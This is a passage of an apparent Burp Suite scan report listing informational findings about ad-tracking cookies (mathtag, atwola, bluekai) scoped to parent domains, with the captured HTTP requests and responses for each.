Cache-Control: private, no-cache, no-store
Content-Type: image/gif
Date: Thu, 16 Jun 2011 11:27:11 GMT
Last-Modified: Fri, 13 May 2011 20:24:53 GMT
P3P: policyref="http://cdn.krxd.net/kruxcontent/p3p.xml", CP="NON DSP COR NID OUR DEL SAM OTR UNR COM NAV INT DEM CNT STA PRE LOC OTC"
Server: Apache
Set-Cookie: ServedBy=logger014; path=/; domain=.krxd.net; expires=Wed, 14-Dec-2011 00:47:11 GMT
Set-Cookie: AWSELB=F71565D91A9FA31F15375726C4E9A41F8610EBF23C5D64AB646BFEB78D85C2CE1B11A4408BBF84184FD95AB42FCDD37D4A5888A04E880077C4A63DD8E25321BB4EF5F9550AD0FDC6E3F9FDDF363AFDD86EB238E86A;PATH=/;DOMAIN=.krxd.net;EXPIRES=Wed, 14-Dec-2011 00:47:11 GMT
X-Request-Time: D=95 t=1308223631740689
X-Served-By: logger014.krxd.net
Content-Length: 42
Connection: keep-alive

GIF89a.............!.......,........@..D.;

10.275. http://sync.mathtag.com/sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sync.mathtag.com
Path:	/sync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ts=1308226098; domain=.mathtag.com; path=/; expires=Fri, 15-Jun-2012 12:08:18 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sync?mt_exid=2&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=296&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: sync.mathtag.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308225213393&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fburp%2Fshow%2F4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530; mt_mop=9:1305510197|10004:1305981545|5:1305510879|3:1306525248|1:1305510843; ts=1308181166

Response

HTTP/1.1 302 Found
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x2 pid 0x700 1792
Cache-Control: no-cache
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Thu, 16 Jun 2011 12:08:18 GMT
Location: http://tag.admeld.com/match?admeld_adprovider_id=296&external_user_id=4dd07bc8-e97b-118c-3dec-7b8c5c306530
Etag: 4dd07bc8-e97b-118c-3dec-7b8c5c306530
Connection: Keep-Alive
Set-Cookie: ts=1308226098; domain=.mathtag.com; path=/; expires=Fri, 15-Jun-2012 12:08:18 GMT
Content-Length: 0

10.276. http://tacoda.at.atwola.com/rtx/r.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tacoda.at.atwola.com
Path:	/rtx/r.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ATTACID=a3Z0aWQ9MTZ0NTFrbzA5NGswa3U=; path=/; expires=Mon, 11-Jun-12 10:39:33 GMT; domain=.at.atwola.com
ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTYyODI6NTcwOTQ6NjA3NDA6NTYyOTc6NTcxMzA6NTcxMjk6NTMzODA6NjA0ODk6NjA1MTU6NTI2MTU6NTcyODk6NTI5NDY6NTM2NTY6NTU0MDE6NTA1NTc6NTQyNTU6NTM3Nzg6NTQyNTI6NTA5NjE6NTQyMDk6NTY2ODE6NTU0Njc6NTY5Njk6NTY4MzU6NTY3ODA6NTYyMzI6NTY2NzM6NTY3Njg6NTczNzI=; expires=Mon, 11-Jun-12 10:39:33 GMT; path=/; domain=.at.atwola.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rtx/r.gif?cmd=ESU&si=18201&pi=-&xs=3 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/2939?ret=html&phint=keywords%3Dcredit%20cards%2C%20credit%20card%2C%20credit%2C%20creditcards%2C%20visa%2C%20offers%2C%20search%2C%20compare%2C%20apply%2C%20mastercard%2C%20low%20interest%2C%20student%2C%20instant%20approval%2C%20balance%20transfer%2C%20reward%2C%20business%2C%20student%2C%20cash%20back&phint=__bk_t%3DCredit%20Cards%20-%20Compare%20Credit%20Card%20Offers%20at%20CreditCards.com&phint=__bk_k%3Dcredit%20cards%2C%20credit%20card%2C%20credit%2C%20creditcards%2C%20visa%2C%20offers%2C%20search%2C%20compare%2C%20apply%2C%20mastercard%2C%20low%20interest%2C%20student%2C%20instant%20approval%2C%20balance%20transfer%2C%20reward%2C%20business%2C%20student%2C%20cash%20back&limit=4&r=92667289
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DD6D67B6E651A440C6EAF39F001EBEA; ATTACID=a3Z0aWQ9MTZ0NTFrbzA5NGswa3U=; TData=99999|^|51134|56282|61674|57094|60740|56297|57130|57129|61576|51184|53380|60489|60515|52615|57289|52946|53656|55401|50507|50557|54255|53778|51182|54252|50961|54209|56988|57372|56780|56232|56142|56768|56761|56681|56153; N=2:b1077b952a25f0fd4f2da32539b57495,f09c3ed82a5deedcd5f3f90b36c3d896; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTYyODI6NjE2NzQ6NTcwOTQ6NjA3NDA6NTYyOTc6NTcxMzA6NTcxMjk6NjE1NzY6NTExODQ6NTMzODA6NjA0ODk6NjA1MTU6NTI2MTU6NTcyODk6NTI5NDY6NTM2NTY6NTU0MDE6NTA1MDc6NTA1NTc6NTQyNTU6NTM3Nzg6NTExODI6NTQyNTI6NTA5NjE6NTQyMDk6NTY5ODg6NTczNzI6NTY3ODA6NTYyMzI=

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:39:33 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Fri, 17 Jun 2011 10:54:33 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZ0NTFrbzA5NGswa3U=; path=/; expires=Mon, 11-Jun-12 10:39:33 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=; path=/; expires=Fri, 24-Jun-11 10:39:33 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1308307172^1308308973|18201^1308307172^1308308973; path=/; expires=Fri, 17-Jun-11 11:09:33 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|51134|56282|57094|60740|56297|57130|57129|53380|60489|60515|52615|57289|52946|53656|55401|50557|54255|53778|54252|50961|54209|56681|55467|56969|56835|56780|56232|56673|56768|57372|56761|54208|57288|52947|56153; expires=Mon, 11-Jun-12 10:39:33 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:f09c3ed82a5deedcd5f3f90b36c3d896,820ce15ad71ebb5ed9e6683b5630c89d; expires=Mon, 11-Jun-12 10:39:33 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTYyODI6NTcwOTQ6NjA3NDA6NTYyOTc6NTcxMzA6NTcxMjk6NTMzODA6NjA0ODk6NjA1MTU6NTI2MTU6NTcyODk6NTI5NDY6NTM2NTY6NTU0MDE6NTA1NTc6NTQyNTU6NTM3Nzg6NTQyNTI6NTA5NjE6NTQyMDk6NTY2ODE6NTU0Njc6NTY5Njk6NTY4MzU6NTY3ODA6NTYyMzI6NTY2NzM6NTY3Njg6NTczNzI=; expires=Mon, 11-Jun-12 10:39:33 GMT; path=/; domain=.at.atwola.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

10.277. http://tags.bluekai.com/site/2831 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/2831

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

bk=g7FLHjizgJGBvF/1; expires=Wed, 14-Dec-2011 11:23:26 GMT; path=/; domain=.bluekai.com
bkc=KJh56M+/96WxOrOdEPepXaW7sYhXJv/QYJ/cOanRYYziDuyDWDH+g9xnchY/aMTxqqupWv0WVvHV/RV/ojta7DSe/iZ1iWah87uEZ0FtfM8tj7jtq8LXxwTeS/bDMHG9EKEOwrAJj2Dg8vh4TECzBohxo723oKKV/BpPvht0r5LFpK+jfDePmxVzIRYnRBZQE21jZpk4rTBs49NRecnd0FuRVlgDjLfUdZGWJrXDPFdgLz5+870gmPXf89VtoCxYfbVv8dluLpjpFFRbf4dpxVWAdPnhD8l6W9tgmPdfQ98FmxGL+Ox1OtJr5MWidVMp4gd67LNzUf+/K2IC438qYIjbqWzJyL1KSzfUw3s8SnlYkzPCZpkKm2O982IrAncTkUbSNH0FwDtwGtNQ/wJ1dugEwvI5GlbXmuOaBrXwmKbH87M+Dl/tY0x+MZN/zfptJ5ka2V1VldH/zfptBdldINta8arKfodn+v2EIgjBmgWJRUB2LGwLGFg7CldZIr0j+cxiJzNFfPIRT5Ge; expires=Wed, 14-Dec-2011 11:23:26 GMT; path=/; domain=.bluekai.com
bkst=KJhBMM2n96WxhSz/Y/ASxE+OnshU57jZLfrAmo/DYQ3KvaMstflYw0K//SxE2J1/+FAWQZ9Ck7T1hzqKJomp0u+dfXtXNTYUJL9uMvgnbZjzw4ZdQySXY+39nawbUhQ/74jLUe5Xi4XZdQbTCYPcG2UxkbhRHN/CK3zbHVZRvSjQ2ct5dN0LmcpTW4xgSOl/mFJOGd4OSLE9CMbtFXPr+6Y6sIjgckFpBGbaBLRAHSk9HRHV0VaDGqE7hmp66aJKFlbVdYq6LLchRJInFgFs/8gzfGl0d/v0EgdcflUaNQg913xpxguEA2whN5t68+tNCqsgLZ9sGshJPQ==; expires=Wed, 14-Dec-2011 11:23:26 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2831?phint=zip=&phint=age=&phint=gender=&phint=segment=000 HTTP/1.1
Host: tags.bluekai.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/2939?ret=html&phint=keywords%3DInstant%20Approval%20Credit%20Cards%2C%20guaranteed%20approval%20credit%20cards%2C%20credit%20card%2C%200%25%2C%20low%20apr%2C%20apply%2C%20online%2C%20rate%2C%20credit%20card%20applications%2C%20application&phint=__bk_t%3DInstant%20Approval%20Credit%20Cards%20-%20CreditCards.com&phint=__bk_k%3DInstant%20Approval%20Credit%20Cards%2C%20guaranteed%20approval%20credit%20cards%2C%20credit%20card%2C%200%25%2C%20low%20apr%2C%20apply%2C%20online%2C%20rate%2C%20credit%20card%20applications%2C%20application&limit=4&r=64038494
Cookie: bkp1=; bku=qxW99BY4DAtkc89a; bkw4=; bk=OKqFqjizgJGBvF/1; bkc=KJh56gkn96WDOFOFlveZ6ed9RneyiiCRuxT/onY1iWuhDWxx+qWun/hY/aoT/BoGj0aRYqa/gD/vWDLfYprFGWQv9tJx4s2NTgyoj75dfwFKcnLjwN9/vCha3iAwaenAflgoruD/2dHnC0llO3D7wB/mdkNDysAnzB85E5sMbfhkpZ+l6AiL9GFAmL3phlpuG8R8gdljeWpKv3pX2VmwVISXSz8gCyw98oHYbnNuXlhxK+R08fUUSwX42yGMrjKS7h3ACtiR8gptwClKzQhRSYtkc1H2fcJDILc0lGe6gZUrgNtZFVdEK3fSur8XqvzYTVsdBmKNMIk5gacC67eW1+5gC8gGdeLDXGj4bSmj87g+SqGzqQse6V5SglnBffVn+J89Wziul4Ic7wOnzfltYqkx9BvsTIFuUv22x4judfMCbp8og+4IGr2d+bmx47rAdXdgr3PnI3j5mgAORU5ILAwtDFIpQN2p4dj1EM3jkKSf2QXI5BJe; bko=KJ0ETtBQWnUXfzF161EOy19cjeWhEsveicWy7mPZRwCiX5rUAVWi7vUm0XYyY1CijRQPCn9RsjEjRvpEUeYVvkx5WX15/1rFIEVxkxCA8z3IO1gsYzaRLA9UCnhfOouPCn/RsxeAwiVm; bkw5=KJh2AfagWlWDhf2lPhwFpAGsAj/L/iRhE5nWRY9sRi2YefkAaB3os9p+vWvfB/LSD4IYtYwmlruAQTiNQ0YmELDoWBcOxHuHqGN2flbO5TJZI5l5fdwf4+2fFdKrAyjy1L9cKkp9FE0QGVzUDA9lx+JT1YV81FeL/Z6k9NM60sBDRZJSK6I90uJ+VDB1BYYsZbbxDjTN43ijh2BnxgTDQs+ZQcUu71PCOjiqj3Yi2KpazctH6FY00wT3XC/mvr/unT7dSExFYbZUknI3znXb0f2/qd4oqBIQ11CUPzldJbpXBtc7E8xaiOuGLixtS6/KPCUC71fMH6NrdUsW71wliYj5Tp3s0mM9Y5ptZ9017NK9lJEyejgRJ3JEfztf2sPNIXEgj/q56awMPN3wEiVpsrTy1UlXoZ6e3XFibEPWGdIkK5bx3CqyISgAfGqblK7o3mSH9tyLOmisK2XzoSWnyp+cbLlOSA32FNSWjweskHrd8S3mz+RJFcD8ytQUlf+3zkdjw/PqgZHTKJl7hX4cmsr6kA0J8XZDjOeljANJQ7uyCbsn9uwi6ZZo0Wb1mpchoJohu6lrZ4Y4KHlHlsig0/AL8NHrpTgXJppgR6l70m1tgywMvdPn5VNQfaOcMycyC8jx; bkst=KJhBMMNn96WxC3z/YWSMGaSYVBQrpmp1j75J5uxoaYJTGZ9jqdzvw6Txx6Q7bYXHqw6aQZ9CkFT1hzqKhLljlJEwIyfwtTn7HR9aZaE7N5V6K7YdGhSXJnxmVSqydXQpVUuiqz2doFyN8E+Q/8DuBv3hv6DJOkRImvrbHSkamWuFXqqr4pxPIl44Y46A+9jLnerw8JylumHaXdFtPToUtGtweEX455IKu0DD3nVmiZBOioZ1uF2OI5vzLGMaLKsXBM0Zdiq6LIcCzWIvQqtA9885f6f0d/0pf39FqfPoShkQYK/JW87j64c6TrSo8glPhGJmVF9cHf81P9==; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101x8L4r6n9W5cOkz=; bklc=4dfb2873; bkdc=res

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:23:26 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Sat, 18 Jun 2011 11:23:26 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=g7FLHjizgJGBvF/1; expires=Wed, 14-Dec-2011 11:23:26 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56M+/96WxOrOdEPepXaW7sYhXJv/QYJ/cOanRYYziDuyDWDH+g9xnchY/aMTxqqupWv0WVvHV/RV/ojta7DSe/iZ1iWah87uEZ0FtfM8tj7jtq8LXxwTeS/bDMHG9EKEOwrAJj2Dg8vh4TECzBohxo723oKKV/BpPvht0r5LFpK+jfDePmxVzIRYnRBZQE21jZpk4rTBs49NRecnd0FuRVlgDjLfUdZGWJrXDPFdgLz5+870gmPXf89VtoCxYfbVv8dluLpjpFFRbf4dpxVWAdPnhD8l6W9tgmPdfQ98FmxGL+Ox1OtJr5MWidVMp4gd67LNzUf+/K2IC438qYIjbqWzJyL1KSzfUw3s8SnlYkzPCZpkKm2O982IrAncTkUbSNH0FwDtwGtNQ/wJ1dugEwvI5GlbXmuOaBrXwmKbH87M+Dl/tY0x+MZN/zfptJ5ka2V1VldH/zfptBdldINta8arKfodn+v2EIgjBmgWJRUB2LGwLGFg7CldZIr0j+cxiJzNFfPIRT5Ge; expires=Wed, 14-Dec-2011 11:23:26 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJhBMM2n96WxhSz/Y/ASxE+OnshU57jZLfrAmo/DYQ3KvaMstflYw0K//SxE2J1/+FAWQZ9Ck7T1hzqKJomp0u+dfXtXNTYUJL9uMvgnbZjzw4ZdQySXY+39nawbUhQ/74jLUe5Xi4XZdQbTCYPcG2UxkbhRHN/CK3zbHVZRvSjQ2ct5dN0LmcpTW4xgSOl/mFJOGd4OSLE9CMbtFXPr+6Y6sIjgckFpBGbaBLRAHSk9HRHV0VaDGqE7hmp66aJKFlbVdYq6LLchRJInFgFs/8gzfGl0d/v0EgdcflUaNQg913xpxguEA2whN5t68+tNCqsgLZ9sGshJPQ==; expires=Wed, 14-Dec-2011 11:23:26 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Sat, 18-Jun-2011 11:23:26 GMT; path=/; domain=.bluekai.com
BK-Server: 9936
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!.. ....,...........L..;

10.278. http://tags.bluekai.com/site/2939 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/2939

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

bk=ivROpPU97tid8JkA; expires=Wed, 14-Dec-2011 10:42:49 GMT; path=/; domain=.bluekai.com
bkc=KJh566N/sNWxOded1TZ4BSO/CSTWyudi50IYnxikJyX8H7JxHnaSFa4WvYgihP/ynu3W6J+KCcbxAp6DvQUhbvkD6/+Va//Ru0W3aVzu72ZjyIf0t8k8qlq4K2W0/mAR2cqzC9oQWYU4aCgL+BIWFwOAwEROTKjmbSO030w5f8UtxwggecOBBFHINQ5A/LYJ0TBKbUbUrUfe04PgFSbz7GHySkMS3zbfASTKb3402YGDHBMcfiFBI2Gwewyt3YnlR5Iy/XoC07KqIfUZXznlTpDCkjtwT2j78HH4BXizU2abOnnKVG/y8N+FD2m47yeqjmb4dDZjXb6lSK8AWQCzd3wbflftX6Popg4IUyEDMy/FUIU3tUUv7sd+Gdg5EVYwb3NdvAX7o1KP8IwuiEUoThUoAyduOX3dksFKuNzGk0+fkS1hbE4FoB1n6AIgowkdVUXCfd0Q1IP0UnZtUogggRmwQvPOQNxbf2Km2vQ0NNLw6KlMVIeGQ+zfjT8qa8z9CfxdVL8pIKp8YKA8jSblU3UefMXtSv68KlYozk+9Iid+nfzFk5wvDXIAi8Dpl5/U07IDRNlu0XgX45Rk+Of4ScXI57kAx4ga7exdgxB67i1BHMMPvm1X7dD57/5x0Q==; expires=Wed, 14-Dec-2011 10:42:49 GMT; path=/; domain=.bluekai.com
bko=KJ0ETtBQVv7dt8KHGRZeQzWE0sJiZ1QBR6NiQXM01YQeVz4NxmomzXaRmTxCnYRsPPT/u8eOZhzZoQ8kXEwWYAJRp9h7ruWLaGjy5QSsPwk4xaB6QvqXKwzE0YGW3gFTburxozz1RUW019ea+1Oi5TeZbziXOm3BWTvyZOQuGVvLewk9X8C4w9K3uIOCR/CfXQhGZhSz5RA4yQnShQ+MuxJ2difTakOVaLQvtcQ5Se/90+Hc0y==; expires=Wed, 14-Dec-2011 10:42:49 GMT; path=/; domain=.bluekai.com
bkst=KJhBMfNn96Wxhqz/vYqOxgOHh1JtpzhIqhkiYWHmYxGZ85lrcSQx+RQOSl+fKyLg65G34TsBVao3mi+Oqj0nMPLBFlkFl+LvKNhQ2YRwn6ZaEVMKRvf/5YfEyJN1JPzCoBpaNcJqiapklCMkQgQF2DIA7tmMT4cyjepXlFyC2WaGiE7kMjjQoO5SY365Z1cPvb6U3dXz+TluAPHnCNxsx91S2W/bJHahdFtBNo4PLomvWVyVc1I2pEiiYNpswcYqrS9eJPaSRdScs2vFLaSpF54Kt5XNVyK2Nk77/G8wm6UGcslc8FVLunltk0o9GHjvYbYtWoprpSbLNHZg1UzKeAK2q+nF5y4n3NwipXEUsxG71ILaG9xWQ9puiO9/ON1/jKol8RNoFVyKFDZ+Dpklco9gslwrRbuoXJisEvJsoEbdAkd2UtPj; expires=Wed, 14-Dec-2011 10:42:49 GMT; path=/; domain=.bluekai.com
bkw5=KJhNkW+GWNWDCFdJVJF1NagO+ZJWPs0kSDJi6+QRL/taELL6yuyW5Vm+iUUkYhEWveT3bk/WGNZTYiSYrOYki/CrHnGDacsgN/VQSaUWP4uzrPwrRsTemjw15XT2gl2Z3QK9FTT8rQpiRMIQGVusQ6eHxpvTfJvIsB9/6utMMGRs5mv9huHQwn6ahOtFvFiMTz6QthjMlRld0PLwZxXe/TWb2+BoZdWferCrOuJq0xpaPa8zpzBpu8acxxtw/bJmQ0bMKOKU5SSM/GjfsXSnJBYi0Y7mat5abwXkioMH9Hw2ujsaF5uW/2PAb51TXT3W568clEZ2F9IXcbOqaOmZw7+hmYPMgixaTVTuIJSumfpZ/VaX2zE1Wgs/FsTkOyh+a0ERe4uAKeRP2w39BC0pQVDGb2dJGbpdzSydpES0UAm4bXrpfX/oXFUHCc5KGemBTQhxucwIY7THf6O6ZnmD2RPoTJYcg1HVkdyQzLHetMciWL88lWBVRj2n4kn1Yx2jME6rTjgwKAQ7hklY4EpR/KK8eHIc8BurjGeoBUDD7HNXpLi2lHpkFPEhp1K55rPAqxPnv/gpg1PpuIoeEPQ4SLJ8Uk7itU+i6QD7nP7qfJMRtlVvtREJ1qAldpC2t0omqxZqbbhCndNKfZoJpBtto4/c6s3g7fjZgXVSNRHg7oGxBVzGGRssnqVtm0+imgjy+kCV7qwjSps7Z7emFNZCwIfEh/zLtfnI0PaoLtnwmJS7/JxZ+YmDUBSBKqq+jw18f3uveEogwIgjXM6ZVLtoCBuxWtXDNFF8USJslL+sEmEasTUlDMvdcsufzJg+lueUUiBftTNQdRDyZP5wo5kgzuo3ykm8T8Y3LbBraJ0E9TqszFzXZdX9GjnTrx==; expires=Wed, 14-Dec-2011 10:42:49 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2939?ret=html&phint=keywords%3DInstant%20Approval%20Credit%20Cards%2C%20guaranteed%20approval%20credit%20cards%2C%20credit%20card%2C%200%25%2C%20low%20apr%2C%20apply%2C%20online%2C%20rate%2C%20credit%20card%20applications%2C%20application&phint=__bk_t%3DInstant%20Approval%20Credit%20Cards%20-%20CreditCards.com&phint=__bk_k%3DInstant%20Approval%20Credit%20Cards%2C%20guaranteed%20approval%20credit%20cards%2C%20credit%20card%2C%200%25%2C%20low%20apr%2C%20apply%2C%20online%2C%20rate%2C%20credit%20card%20applications%2C%20application&limit=4&r=39496438 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/instant-approval.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=cQ6991Cf6W6Oh0NB; bklc=4dfb282e; bko=KJhgTZOQIvUlt8KHxjZBQKWTZcVSYXqS/xhC1EsGXAJRQQpKFe9h5uin70aVW1JijMMneVsh1/up1pYA0FXYZ3/eBmUcr829PiaxlzPwUTWLwVR/i8mO9uiZOHSf9pHwHIRkDsIzW/EahJ9/aVBk09KShdpimPe5JeS/ZfAjJQJ+IdTzJJq9yX9x2Ixj69PSzBRk4QQnb9JKsWruMTcCU49+GvyLAOVyXEgxBQYy+64B; bkst=KJykMgNn96Wxhqz/vYjUYESvVBirprp7qOkim/izWCH10gF5mN9CSCWeNFqt2+Si+PUI9Crh+BH6PGnSrOK7KFpKTXNgLvzkaZdbIJGNteE3EDjPGDrjK6T0kNh87l1vrKVtW3D37EsvFciGXXXhFXesG2wHtVE6LdDq6V5W0T0D1N3YAD8GvqxZ11mq+tC7p53V0QOGx/Bmua/uWHzdl3B2lSyc3Oe9ao8TbVpOWzkpsDgwqDaKINQq3f47QI2i4oPNt+tef+fCF+A8b7zr63LymDXg78fLCFq+dsFuIFX3xvWVuQr/60uxfL2qNCwsVGyrd4sTlXLsQ28yjV6VIDFAsyya0z/b9uQO9SY9wYeTintoCenJ456huIgkyj7zAiG8mDYrqYi8Y0s30ZcrYTASk4gbpFT9cfaQO9==; bkw5=KJh+A6NGWNWxhdIqqVt0VtLatTGHDqsPoiZBED+MehGnqLLtyH0WbLPIoBSEtGvYsWrgO4DGxk5pXOH1OW2KiGCTWFWGb1sg6OTWoStvK/gmFw4YwLys1gFLqtqK4pfK5YK9z9UFbEsWtpt9QR/5MynPsct0v3QSxOrZcYRHb2DMGa2Tkz9d9hIctejSIhdIEp8oje6mMWx3rWejMrOlwtY3zyot5TJ+nOcAhVoKn9v2HmXxVEWOspteA7O11msR7Dk5pHVk8rNpTw194SvRmJlECDLosz1bfQ8vyFN/RMwk2ImIHrnTgLVLWUs/4sQiO8yTnAZ69IC1zENa5/V9jkhNQxjT8Cj8KmR4RzweqcLwsmCVFkhfmbbEqTMb4V3jzk3pv6OIZ1XFTC4hPFu58a1XzlLmrviHUEiZ09XikpUuQCaaI1h8MKpsKDPIDL0YHFjQxCcV4WLMqHCECmrTkyqZ2kRyvpg2BKlwRwD65fIWN0sroplgvXQfz+SzqHdKmw8WQyk7KI4/qUNo6ywUccXbSbB0OQXG8M9ZHd6jC14GlNyDYo/r307McnlFDcLCKIibXA0KfQYSlme2gwK3vjLKkXgukBjYN4VlTthshgxK8j0JEceZK32S8gXjrHKLtzSUeaFwlOeqDf2JBTUkirxs0J7ve4B1S8N+Y2kzkFVVzBeA7KpE8Fv1iPWVuQ0LjrV28pNzmi1NzGXwREycBvGKaIhF1t0lqfO2sZU+jqvwPxE4LhQZzXsNNlFPS7XiuW76ryB8WHIhea8efVqX9NGshrz=; bk=HOu3ajyv15id8JkA; bkc=KJh566N/s6WDOdedN3EN1t9HOEzLCSjvN/oKCYG/oVKwAHhSx3HPXSTDGNxHnTgQONGxXSRUyqjT3QKCDo9KK0GVtG+o1OeWvWJDVFoKAMcplZalIEcFFf1pI0jHOU0SOsfSqdLz9mdXxYTvoYpc4B/FnuzGFI6bmnvXojh2YIc1QnEq/wlF4iadgIiC1xil5Wick5+zS48KttDGrRZrUkgdy2wgFM9i47jdjzAl9KePLR1bzM2Imr0GzGE3q4BXhF0Iuwa2pzMA8IBhTlxBMVX80JN56d5TKUIKQpeUshduJ7NGO9fJFadLUVVrB2bCr44t9mdiiF/c9UqwgeEUsd229/xsQH5FY77tRtVrBdjEd+LmXJl0hkIPJpSAH8u7NbDllAL7PbPEv2vdkcXGO8KkS8PgkclviuUo6xUof/h6j866f84hHdnHaIoC0IFvM6nu7ezmPyBp1xKjq17egFuQ1rKBTlEq795mp3d0dHXF2G+hKxUyZd3M2Shxp8TKA88u8gphsCtrxBJOVpO286gko8f6J4VUfxFkgwJT+lu8zrbj2n70cIVknrkajPb4zxU2Mll3plgngtKA762JX2wRGd1z4K//j8gAm127dOXq06tw; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101UbZ22LUv1790oYUsJIj/LBQjsOGSsO3SsoGSVHrRsaZjsCAjQ/AeY6BnxhQikZ9iGkHYyYfRHok; bkdc=res

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:42:49 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=ivROpPU97tid8JkA; expires=Wed, 14-Dec-2011 10:42:49 GMT; path=/; domain=.bluekai.com
